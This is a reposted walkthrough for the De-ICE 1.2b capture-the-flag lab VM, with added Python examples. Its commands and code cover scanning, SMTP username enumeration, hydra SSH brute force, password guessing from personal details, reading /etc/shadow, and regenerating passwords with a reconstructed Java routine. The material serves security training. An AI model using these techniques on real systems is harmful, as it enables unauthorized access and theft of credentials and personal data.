HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.



The original post is here.



Links



Watch video on-line

Download video



Brief Overview



The "vulnerable-by-design" series De-ICE has released another challenge. However, it comes in two different parts, which makes the naming even more confusing! This is De-ICE Level 1, Disk 3, the second half, and it should not be confused with "version A" (de-ice-1.120-1.0a.iso, aka Level 1 - Disk 3 - Release 1 - Version A), as these are NOT the same challenge: it is a completely independent one. The students of "HackingDojo" produced their own exploitable LiveCD, which was released under the De-ICE name. This is it. To date, all of Heorot.net's releases (in date order) are as follows:



De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)

De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)

De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)

pWnOS (pWnOS v1.0.zip)

Hackerdemia (hackerdemia-1.1.0.iso)

De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)

De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)



Method



Pre-setup (configured our IP address, as the host has a static IP in the 192.168.1.0/24 range)

Scanned the network for the host (nmap)

Port scanned the host (unicornscan)

Enumerated the services running on the open ports (nmap)

Enumerated possible username(s) (Netcat)

Brute forced login details (Hydra)

Profiled other users (CUPP)

Escalated privileges by re-creating the custom encryption program (Java)

Found the "flag" (a database file)



What do I need?



de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)

Spare or a Virtual machine (Example: Virtual Box or VMware Player)

nmap – (Can be found on BackTrack 5).

unicornscan – (Can be found in BackTrack 5's repository).

hydra – (Can be found on BackTrack 5).

Common User Passwords Profiler – (Can be found on BackTrack 5).

Java compiler – (Can be found on BackTrack 5).



Walkthrough



A quick "ping" scan with nmap reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) is taken via unicornscan. The results are then checked with another detailed TCP port scan, as well as enumerating which services are running, by using nmap. Unicornscan is quicker at port scanning (especially UDP scanning). However, nmap has the upside of being able to do more "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using the "-A" option). The attacker also increases the scan speed (by using "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).



The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that the web site is "under maintenance", with methods of contact: a telephone number and an email address.



The port scan revealed that an SMTP service was running, so the attacker decided to use the email address to identify possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email: depending on the recipient's name, the server returns whether the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find the valid login, csadmin.



The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password; however, it would have taken a lot longer to reach it.) The attacker starts hydra against the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker finds the valid password, 'rocker'.



Upon logging into the system remotely, the attacker checks whether there are any other valid users on the system (there are 4). The attacker then continues by browsing the user's (csadmin's) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user, which is also commonly used as their password.



After building up a profile for each user, the attacker then generates possible passwords from this information using CUPP (Common User Passwords Profiler). The attacker enters the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the password of the user sdadmin (his child's name and year of birth: donovin1998).



The attacker logs in with the new credentials, views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feelings towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (a nickname with a few numbers at the end: databaser60).



When the attacker logs in once again, they soon find the first part of an email which has been in every user account so far. The contents of the email have been "corrupted"; however, the headers of the message are still intact. The subject of the message implies its purpose: "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which reveals the beginning of the possible source code.



The attacker then assembles the code from the three parts found so far. It is written in Java, and its function is the generation function for the new password policy. There are comments left in the code saying it has already been used on two accounts (sysadmin and root). The attacker then fixes and cleans up the code and adds the missing pieces (input and conversion functions).
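The strings/cut/sed/sort pipeline in the Commands section below does this reassembly by hand, one part at a time. As an added example (not code from g0tmi1k's original post), here is the same procedure in Python, generalized to any number of parts and extended with the check the walkthrough's author had to do by eye: it reports which line numbers are still absent, so you know whether another mail part is yet to be found. The three byte strings are constructed for this example and are not the challenge's real part files; the tab-separated record layout (header field, line number, source line) is an assumption modelled on the pipeline's cut and sed steps, and the function names are mine.

```python
import re
import string

# Constructed sample data: three "corrupted" mail parts, each carrying a few
# printable records of the form <header field>\t<line number>\t<source line>
# buried between non-printable bytes. These bytes are made up for this example;
# they are not the challenge's real 2010122216451.f81Ltw4R010211.part* files.
PARTS = {
    "part1": (b"\x00\x01\xff"
              b"X-Seq\t3\tint strL=input.length();" b"\x07\x00\x9a"
              b"msg\t1\t/*input is username of account*/" b"\x00\x00"),
    "part2": (b"\x13\x88"
              b"hdr\t  6\tint[] encArr=new int[strL+2];" b"\xfe\xfe"
              b"hdr\t2\tpublic static int[] processLoop(String input){" b"\x00"),
    "part3": (b"\xaa\xbb\xcc"
              b"zz\t5\tint fChar=(int)input.charAt(0);" b"\x00"
              b"not a code line" b"\x01"
              b"zz\t3\tint strL=input.length();"),   # duplicate of a part1 line
}

# What `strings` treats as printable: graphic ASCII plus space and tab.
PRINTABLE = set(bytes(string.printable, "ascii")) - set(b"\n\r\x0b\x0c")


def strings(data, min_len=4):
    """Emulate `strings`: yield maximal runs of >= min_len printable bytes."""
    run = bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run = bytearray()
    if len(run) >= min_len:
        yield run.decode("ascii")


RECORD = re.compile(r"^(\d+)\t(.*)$")


def extract_numbered_lines(data):
    """One part through the walkthrough's pipeline:
    strings | cut -f2- | sed 's/[ \\t]*//' | sed -n '/^[0-9]*\\t/p'
    Returns [(line_number, source_line), ...] in the order found."""
    records = []
    for s in strings(data):
        fields = s.split("\t")
        # cut -f2- drops the first field; a line with no tab passes through whole
        rest = "\t".join(fields[1:]) if len(fields) > 1 else s
        rest = rest.lstrip(" \t")          # sed 's/[ \t]*//'
        m = RECORD.match(rest)             # sed -n '/^[0-9]*\t/p'
        if m:
            records.append((int(m.group(1)), m.group(2)))
    return records


def reassemble(parts):
    """Merge every part, order by line number (sort -g), keep the first copy of
    any duplicate, strip the numbers (cut -f2-) and report gaps in the numbering
    so it is obvious when a further part is still missing."""
    by_num = {}
    for data in parts.values():
        for num, line in extract_numbered_lines(data):
            by_num.setdefault(num, line)
    nums = sorted(by_num)
    missing = [n for n in range(nums[0], nums[-1] + 1) if n not in by_num] if nums else []
    return "\n".join(by_num[n] for n in nums), missing


if __name__ == "__main__":
    source, missing = reassemble(PARTS)
    print(source)
    print("missing line numbers:", missing)
```

Run it as-is and it prints five ordered source lines and reports line 4 as missing; feed it the real part files (read in binary mode) in place of the constructed dictionary and the same gap report tells you whether the listing is complete before you try to compile it.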



Once the program is complete, the attacker runs it to generate the passwords for the sysadmin and root accounts. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.
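As an added example, not code from the original post or from the challenge itself, here is a Python port of the generation routine (the deice.java listed later on this page), written to make the security point explicit: the scheme takes no key, no salt and no randomness, so each password is a pure function of the username, and anyone who reads the source (here, out of three users' mail folders) can regenerate every password it has ever produced. The function names are mine; the behaviour mirrors the Java step for step, including its swap loop.

```python
def _back_loop(arr):
    """backLoop(): fold every value around the average of arr[1] and arr[-1]."""
    ref = len(arr)
    ch = (arr[1] + arr[ref - 1]) // 2
    for i in range(ref):
        if i % 2 == 0:
            arr[i] = (arr[i] % ch) + (ref + i)
        else:
            arr[i] = arr[i] + ref + i
    return arr


def _loop_back(arr):
    """loopBack(): widen the array by half, then clamp into printable ASCII.
    The copy loop stops at len(arr), so the last ref//2 values are dropped."""
    ref = len(arr) // 2
    enc = [0] * (len(arr) + ref)
    start = ref // 2
    for i in range(start, len(arr)):
        enc[i] = arr[i - start]
    for i in range(len(enc)):
        if enc[i] <= 33:
            ref += 1                       # Java: 33+(++ref*2)
            enc[i] = 33 + ref * 2
        elif enc[i] >= 126:
            ref -= 1                       # Java: 126-(--ref*2)
            enc[i] = 126 - ref * 2
        elif i % 2 == 0:
            enc[i] -= i % 3
        else:
            enc[i] += i % 2
    return enc


def _loop_process(arr):
    """loopProcess(): substitute the code points for '(', ')' and '-'."""
    for i in range(len(arr)):
        if arr[i] in (40, 41):
            arr[i] += len(arr)
        elif arr[i] == 45:
            arr[i] += 20 + i
    return arr


def derive_password(username):
    """Port of deice.java's processLoop(): the password depends on the
    username alone, so the source code is effectively the master key."""
    if not username:
        raise ValueError("username must not be empty")
    # last character, then the username, then its first character
    codes = [ord(username[-1])] + [ord(c) for c in username] + [ord(username[0])]
    codes = _loop_process(_loop_back(_back_loop(codes)))
    # The Java swap loop keeps going past the midpoint on even-length arrays and
    # undoes its own work, so only odd-length outputs are actually reversed.
    # Mirror it exactly rather than calling reversed().
    j = len(codes) - 1
    for i in range(len(codes)):
        if i == j:
            break
        codes[i], codes[j] = codes[j], codes[i]
        j -= 1
    # Java's (char) cast keeps the low 16 bits of the int
    return "".join(chr(c & 0xFFFF) for c in codes)


if __name__ == "__main__":
    # The two accounts the code's own comment says were moved to the scheme.
    for user in ("sysadmin", "root"):
        print(f"{user}: {derive_password(user)}")
```

The two values it prints match the passwords quoted in the Commands section, which is the whole problem: a "custom encryption" that any reader of the code can replay is not a password policy, and an administrator auditing such a system can use exactly this function to find every account still set to its scheme-generated value.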



The attacker now has access to the complete system...



Game over



...and chooses to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file and, by trying all the encryption algorithms with the super user's password, is able to decrypt the file and view its content in plain text, revealing customers' details, such as names, email addresses, usernames, passwords and more!



Game over...again



Commands



ifconfig eth0

ifconfig eth0 192.168.1.192

ifconfig eth0

nmap 192.168.1.* -n -sn -sP

us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.1.20

firefox 192.168.1.20 # customerserviceadmin@nosecbank.com

nc -v 192.168.1.20 25

HELO attacker

VRFY customerserviceadmin

mail from: attacker@slax.example.net

rcpt to: customerserviceadmin

rcpt to: csadmin

quit

wc -l /pentest/passwords/wordlists/darkc0de.lst

find / -name password.lst

wc -l /opt/framework3/msf3/data/john/wordlists/password.lst

hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output

ssh csadmin@192.168.1.20 # rocker

id

cat /etc/passwd # sysadmin, dbadmin, sdadmin, csadmin

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)

exit

cd /pentest/passwords/cupp/

python cupp.py -i # Paul, Donovin, 22121998, nosecbank

hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh sdadmin@192.168.1.20 # donovin1998

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less # dbadmin (Fred, databaser)

exit

python cupp.py -i # Fred, databaser, nosecbank

hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh dbadmin@192.168.1.20 # databaser60

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less # sysadmin, New Custom Encryption for Passwords

umask 002

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' > /tmp/output

su csadmin # rocker

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output

su sdadmin # donovin1998

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output

cat /tmp/output | sort -g

cat /tmp/output | sort -g | cut -f2-

exit

exit

exit

geany deice.java

less deice.java

javac deice.java

java deice # sysadmin - 7531/{{tor/rv/A

java deice # root - 31/Fwxw+2

ssh sysadmin@192.168.1.20 # 7531/{{tor/rv/A

id

su - # 31/Fwxw+2

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

pwd

exit

pwd

ls

cat Note_to_self

ls -lAhR /home

cd /home/ftp/incoming/

ls -l

openssl -h

openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"

su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"' # 31/Fwxw+2

ls -l

cat useracc_update.csv




deice.java



// Note: the '<' comparisons in the loop headers were lost in this copy of the
// listing (stripped as HTML) and have been restored so that the program again
// reproduces the two passwords quoted in the Commands section above.
import java.io.*;
//import java.util.Arrays;

public class deice
{
    public static void main(String[] args)
    {
        try
        {
            System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");

            BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
            System.out.print("[?] Username: ");
            String input=in.readLine();

            int[] output=processLoop(input);
            //System.out.println("[+] Output: "+Arrays.toString(output));

            // convert each integer back into its ASCII character
            String outputASCII="";
            for(int i=0;i<output.length;i++) outputASCII+=(char)output[i];
            System.out.println("[>] Password: "+outputASCII);
        }
        catch(IOException e)
        {
            System.out.println("[-] IO Error!");
        }
    }

    /*input is username of account*/
    public static int[] processLoop(String input){
        int strL=input.length();
        int lChar=(int)input.charAt(strL-1);
        int fChar=(int)input.charAt(0);
        int[] encArr=new int[strL+2];
        encArr[0]=(int)lChar;
        // the username sits in the middle, wrapped by its last and first character
        for(int i=1;i<encArr.length-1;i++){
            encArr[i]=(int)input.charAt(i-1);
        }
        encArr[encArr.length-1]=(int)fChar;
        encArr=backLoop(encArr);
        encArr=loopBack(encArr);
        encArr=loopProcess(encArr);
        int j=encArr.length-1;
        // swap from both ends until the indices meet
        for(int i=0;i<encArr.length;i++){
            if(i==j) break;
            int t=encArr[i];
            encArr[i]=encArr[j];
            encArr[j]=t;
            j--;
        }
        return encArr;
    }

    /*Note the pseudocode will be implemented with the
    root account and my account, we still need to implement it with the csadmin, sdadmin,
    and dbadmin accounts though*/
    public static int[] backLoop(int[] input){
        int ref=input.length;
        int a=input[1];
        int b=input[ref-1];
        int ch=(a+b)/2;
        for(int i=0;i<input.length;i++){
            if(i%2==0) input[i]=(input[i]%ch)+(ref+i);
            else input[i]=(input[i]+ref+i);
        }
        return input;
    }

    public static int[] loopBack(int[] input){
        int ref=input.length/2;
        int[] encNew=new int[input.length+ref];
        int ch=0;
        // copy the input into the middle of the larger array; the loop stops at
        // input.length, so the last ref/2 values of the input are never copied
        for(int i=(ref/2);i<input.length;i++){
            encNew[i]=input[ch];
            ch++;
        }
        // clamp anything outside the printable range and nudge the rest
        for(int i=0;i<encNew.length;i++){
            if(encNew[i]<=33) encNew[i]=33+(++ref*2);
            else if(encNew[i]>=126) encNew[i]=126-(--ref*2);
            else{
                if(i%2==0) encNew[i]-=(i%3);
                else encNew[i]+=(i%2);
            }
        }
        return encNew;
    }

    public static int[] loopProcess(int[] input){
        // substitute the code points for '(' ')' (40, 41) and '-' (45)
        for(int i=0;i<input.length;i++){
            if(input[i]==40||input[i]==41) input[i]+=input.length;
            else if(input[i]==45) input[i]+=20+i;
        }
        return input;
    }
}




Notes



- De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!

- The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.

- I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!



That's all! See you.